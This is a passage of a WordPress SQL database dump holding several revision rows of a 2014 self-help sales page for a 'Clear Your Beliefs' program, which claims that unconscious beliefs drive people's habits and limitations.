lives.</strong></p>\n\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" />			<p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" />&nbsp;', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:25:26', '2014-12-11 06:25:26', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1978, 2, '2014-12-11 01:41:19', '2014-12-11 06:41:19', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:41:19', '2014-12-11 06:41:19', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1974, 2, '2014-12-11 01:31:45', '2014-12-11 06:31:45', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" />			<p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" />			<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:31:45', '2014-12-11 06:31:45', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1979, 2, '2014-12-11 01:47:33', '2014-12-11 06:47:33', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:47:33', '2014-12-11 06:47:33', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1976, 2, '2014-12-11 01:38:38', '2014-12-11 06:38:38', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" />			<p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" />			<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:38:38', '2014-12-11 06:38:38', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1975, 2, '2014-12-11 01:35:58', '2014-12-11 06:35:58', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" />			<p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" />			<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n&lt;img width=&quot;157&quot; height=&quot;114&quot; alt=&quot;dilap&quot; src=&quot;http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg&quot; class=&quot; wp-image-321 alignright&quot;', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:35:58', '2014-12-11 06:35:58', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1977, 2, '2014-12-11 01:40:09', '2014-12-11 06:40:09', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" />			<p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" />			<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:40:09', '2014-12-11 06:40:09', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
